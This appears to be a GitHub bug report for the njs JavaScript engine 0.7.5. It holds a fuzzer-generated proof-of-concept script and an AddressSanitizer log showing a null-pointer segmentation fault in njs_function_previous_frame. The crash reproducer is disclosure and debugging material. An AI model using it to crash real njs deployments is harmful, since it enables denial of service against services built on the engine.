You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Commit : c62a9fb92b102c90a66aa724cb9054183a33a68c
Version : 0.7.5
Build :
./configure --cc=clang --address-sanitizer=YES
make
Proof of concept
// Minimizing 6DF62492-854B-4782-8E5F-C219F56258E2
function placeholder(){}
function main() {
var v0 = async (v1,v2,...v3) => {
var v10 = `
var v11 = Object(-9007199254740993,-4027512271n);
`;
var v16 = `
var v17 = (-256n)(-9007199254740993,-4027512271n);
`;
var v27 = `
Object[-4027512271] **= -4027512271n;
var v29 = Object(-9007199254740993,...-65536n);
`;
var v33 = `
var v34 = Object(-9007199254740993,-4027512271n);
`;
var v37 = `
var v38 = Object(-9007199254740993,-9007199254740993n);
`;
var v42 = `
var v43 = undefined(-1290018985n,-4027512271n);
`;
var v49 = [-1000000.0,-1000000.0,-1000000.0];
var v57 = `
var v58 = (-1.7976931348623157e+308)(8980,-4027512271n);
`;
var v59 = `
(-4027512271n)[-4027512271] **= -4027512271n;
var v60 = Object(0n,-4027512271n);
`;
function v66(v67) {
v67[1866532165] = Map;
}
function v68(v69,v70) {
var v77 = new Uint8ClampedArray();
var v80 = {};
var v81 = /gL8?/;
var v82 = {};
var v83 = [v80,v82,v81];
function v85(v86) {
v83[1866532165] = Map;
}
async function v89(v90,v91) {
var v92 = await Map;
}
function v93(v94,v95) {
}
var v97 = new Promise(v93);
var v99 = v97["catch"]();
var v102 = {"get":Promise,"set":v89};
var v103 = Object.defineProperty(v99,"constructor",v102);
async function v104(v105,v106) {
var v107 = await v103;
}
var v108 = v104();
var v109 = v85(Map);
var v110 = String();
var v121 = `
var v122 = Object(-9007199254740993,-4027512271n);
`;
var v123 = `
(-4027512271n)[-4027512271] **= -4027512271n;
`;
var v129 = `
var v131 = [-4027512271n,Object,-4027512271n,1,v77,-4027512271n,Object,Uint8ClampedArray,8980,Object];
var v132 = Object();
v132[-4027512271] **= -4027512271n;
`;
var v139 = `
var v140 = Object(-9007199254740993,-4027512271n,0,-4027512271n);
`;
var v147 = `
var v148 = Object(-9007199254740993,-4027512271n,15034n);
`;
var v151 = `
var v152 = Object(-4294967296,-4027512271n);
`;
var v160 = `
var v161 = (-4027512271n)(-9007199254740993,-4027512271n);
`;
var v171 = `
Object[-4027512271] **= -4027512271n;
var v173 = Object(-9007199254740993,-4027512271n);
`;
var v175 = `
var v176 = Object(-9007199254740993,-9007199254740993n);
`;
var v180 = `
var v181 = undefined(-4027512271n,-4027512271n);
`;
var v186 = `
var v187 = "bigint"();
v187[-4027512271] **= -4027512271n;
var v188 = Object(-4027512271n,-4027512271n);
`;
var v189 = `
(-4027512271n)[-4027512271] **= -4027512271n;
var v190 = Object(-9007199254740993,-4027512271n);
`;
var v194 = `
var v195 = ReferenceError(-4027512271n,-4027512271n);
`;
var v198 = Float64Array();
var v203 = `
v198[-4027512271] **= -4027512271n;
var v204 = Object(-9007199254740993,-4027512271n);
`;
var v205 = `
var v206 = Object(-4027512271n,-4027512271n);
`;
var v210 = `
var v211 = (-1070059123)(-9007199254740993,-4027512271n);
`;
var v212 = `
var v213 = ArrayBuffer(-4027512271n,-9007199254740993n);
`;
var v219 = `
var v220 = undefined(-4027512271n,-4027512271n,Uint8ClampedArray,8980,-4027512271n);
`;
var v225 = `
var v226 = (-4027512271n)();
var v227 = v226(0n,-4027512271n);
`;
var v231 = `
var v233 = Object();
v233[-1316174388] >>= -4027512271n;
var v235 = Object["getPrototypeOf"](v110,-4027512271n);
var v236 = Object(-4027512271n,-4027512271n);
`;
var v237 = `
(-4027512271n)[-4027512271] **= -4027512271n;
var v238 = Symbol(-9007199254740993,-4027512271n);
`;
Promise[-4294967297] = Map;
}
var v240 = new Promise(v68);
var v248 = Object();
var v249 = `
var v250 = Object(-9007199254740993,-4027512271n);
`;
var v251 = `
var v252 = v251();
v252[-4027512271] **= -4027512271n;
var v253 = Object(v248,-4027512271n);
`;
var v254 = `
Object[-4027512271] **= -4027512271n;
var v256 = (-4027512271n)(-9007199254740993,-4027512271n);
`;
var v260 = `
var v261 = (-4027512271n)(-9007199254740993,-2147483649n);
`;
var v264 = `
var v265 = (-4027512271n)(v49,-4027512271n);
`;
var v271 = `
var v272 = Error(-9007199254740993,3272380054n,Uint8ClampedArray,8980,0n);
`;
var v276 = `
var v277 = (-4027512271n)(-9007199254740993,-4027512271n);
`;
var v278 = `
var v280 = Object();
v280[-4027512271] **= -767560483n;
var v281 = Object(-4027512271n,-3242169687n);
`;
var v282 = `
(-4027512271n)[-4027512271] **= -4027512271n;
var v283 = Object(-9007199254740993,-4027512271n);
`;
var v287 = `
var v288 = (-9007199254740993)();
v288[-4027512271] **= -4027512271n;
var v289 = v288(0n,-4027512271n);
`;
var v294 = `
undefined[-4027512271] **= -4027512271n;
var v295 = Object(...-2691822435,2828643507n);
`;
var v299 = [-422610.85859980097,13558,-422610.85859980097,-422610.85859980097];
var v301 = Object();
var v303 = v299["toString"](v301);
var v304 = Function(v303);
};
var v305 = v0();
}
main();
// CRASH INFO
// ==========
// TERMSIG: 11
// STDERR:
Stack dump
AddressSanitizer:DEADLYSIGNAL
=================================================================
==9592==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000056 (pc 0x0000005094d3 bp 0x7fffa7f408f0 sp 0x7fffa7f40140 T0)
==9592==The signal is caused by a READ memory access.
==9592==Hint: address points to the zero page.
#0 0x5094d3 in njs_function_previous_frame /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.h:167:5
#1 0x5094d3 in njs_vmcode_return /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_vmcode.c:1843:16
#2 0x5094d3 in njs_vmcode_interpreter /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_vmcode.c:737:24
#3 0x574c72 in njs_function_lambda_call /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:693:11
#4 0x573e4f in njs_function_frame_invoke /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:769:16
#5 0x503e61 in njs_vmcode_interpreter /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_vmcode.c:799:23
#6 0x4fa5ae in njs_vm_start /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_vm.c:541:11
#7 0x4df3fb in njs_process_script /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_shell.c:1132:19
#8 0x4e007f in njs_process_file /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_shell.c:836:11
#9 0x4ddbe8 in main /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_shell.c:483:15
#10 0x7fa3e91a8082 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x24082) (BuildId: 1878e6b475720c7c51969e69ab2d276fae6d1dee)
#11 0x41ea7d in _start (/home/ubuntu/njs-fuzz/JSEngine/njs-target/build/njs+0x41ea7d)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.h:167:5 in njs_function_previous_frame
==9592==ABORTING
Environment
Proof of concept
Stack dump
Credit
dramthy(@topsec alpha)
The text was updated successfully, but these errors were encountered: